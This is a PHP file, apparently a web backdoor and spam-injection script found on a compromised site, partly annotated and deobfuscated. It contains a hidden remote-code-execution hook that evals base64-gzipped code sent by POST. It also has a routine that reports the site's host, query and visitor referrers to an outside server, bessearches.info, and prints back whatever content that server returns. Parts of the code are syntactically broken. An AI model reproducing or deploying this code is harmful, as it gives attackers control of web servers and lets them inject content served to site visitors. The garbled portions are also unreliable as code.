$ACCOUNT="kia2"; 
error_reporting(0);

// ------- Can we access URL’s like files ?? --------
if (@ini_get('allow_url_fopen')==1) { $CANOPENURLASFILE="on"; }
else{	$CANOPENURLASFILE="off";}

// execute a base64-gzdeflated command passed in $_POST["I1llI1"]
if (isset($_GET["l11Ill1II"]) && !empty($_POST["I1llI1"])) {
	set_time_limit(0);  // limits maximum execution time to 0
	eval(gzinflate(base64_decode($_POST["I1llI1"])));
	exit;
}

/* The below string contains a function that parses the URL parameter
   after “?” and passes it to document.write()
/*
$functionCode = "function z(str) { 
	var a = str.indexOf('?'); 
	if (a == -1) return str; 
	var len = str.length; 
	var b = ''; 
	var i = 1; 

	for (++a; a < len; a += 2,i++) { 
		var ch = parseInt(str.substr(a, 2), 16); 
		b += String.fromCharCode((ch + i) % 256); 
	} 
	document.write(b);
}";

function TALK_HTTP($SUBMISSION_ADDRESS, $URL_PARAM_OBFUSTCATED = "", $TYPE = "get", $UNKNOWN_PARAMETER = "")
  {
    $IIIIIIIIII1l = parse_url($SUBMISSION_ADDRESS);
    $IIIIIIIIII11 = "\r\n";
    $host = $IIIIIIIIII1l["host"];
    $IIIIIIIIIlII = $IIIIIIIIII1l["scheme"]."//$host";
    $path = $IIIIIIIIII1l["path"];

    if (isset($IIIIIIIIII1l['query'])) $IIIIIIIIIlIl = $IIIIIIIIII1l["query"];
    if (isset($IIIIIIIIIlIl) && !empty($IIIIIIIIIlIl)) $path.="?".$IIIIIIIIIlIl;
    $IIIIIIIIIlI1 = strtoupper($TYPE)." $path HTTP/1.0".$IIIIIIIIII11.
               "Referer: $IIIIIIIIIlII".$IIIIIIIIII11.
               ($UNKNOWN_PARAMETER ? "Cookie: ".$UNKNOWN_PARAMETER.$IIIIIIIIII11 : "").
               "Connection: Keep-Alive".$IIIIIIIIII11.
               "Cache-Control: no-cache".$IIIIIIIIII11.
               "Content-Type: application/x-www-form-urlencoded".$IIIIIIIIII11.
               "Content-Length: ".strlen($URL_PARAM_OBFUSTCATED).$IIIIIIIIII11.
               "Host: $host".$IIIIIIIIII11.
               "Accept: */*".$IIIIIIIIII11.
               
               "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyIE2)".$IIIIIIIIII11."".$IIIIIIIIII11.
               $URL_PARAM_OBFUSTCATED;

    $SOCK_HANDLE = fsockopen($host, 80);
    
    fputs($SOCK_HANDLE, $IIIIIIIIIlI1);

    while(!feof($SOCK_HANDLE)){
  	@$RESPONSE .= fgets($SOCK_HANDLE);
    }
    fclose($SOCK_HANDLE);
    
    $RESPONSE_ARRAY = explode("\n\r",$RESPONSE);
    if (count($RESPONSE_ARRAY)==1){
	return $RESPONSE;
    }
    elseif(count($RESPONSE_ARRAY)==2) {
	return  trim($RESPONSE_ARRAY[1]);
    }
}

if (!empty($_GET["a"])) {exit($functionCode);}
if (!empty($_SERVER['argv'])) {$argv = $_SERVER['argv'];}
elseif (!empty($_SERVER['QUERY_STRING'])) {$argv[0] = $_SERVER['QUERY_STRING'];}
elseif (!empty($_GET['show'])) {$argv[0] = $_GET['show'];}
else {exit;};


$URL_PARAM = "url=http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."&key=".$argv[0]."&acc=$ACCOUNT";
if (!empty($_SERVER['HTTP_REFERER'])) {
	$URL_PARAM .= "&ref=".urlencode($_SERVER['HTTP_REFERER']);
}
$SUBMISSION_ADDRESS = "http://bessearches.info/virtual/gen.php";

if ($CANOPENURLASFILE=="on")
{
    $FILE_CONTENTS = @file_get_contents($SUBMISSION_ADDRESS."?".$URL_PARAM);
       if (empty($FILE_CONTENTS))
       {
           $HANDLE = fopen($SUBMISSION_ADDRESS."?".$URL_PARAM,'r');
           while (!feof ($HANDLE))
           {
            $block = fread($HANDLE, 4096);
            $FILE_CONTENTS .= $block;
           }
           fclose($HANDLE);
       }
}
elseif($CANOPENURLASFILE=="off")
{
       if (empty($FILE_CONTENTS))
       {
		$precalculated =
 			cmd=".urlencode(base64_encode(gzdeflate($URL_PARAM)));

       	$FILE_CONTENTS = 
			TALK_HTTP(	$SUBMISSION_ADDRESS,
				$URL_PARAM_OBFUSTCATED = $precalculated,
				$TYPE = "post",
				""
			);
       }
}
echo gzinflate(base64_decode($FILE_CONTENTS));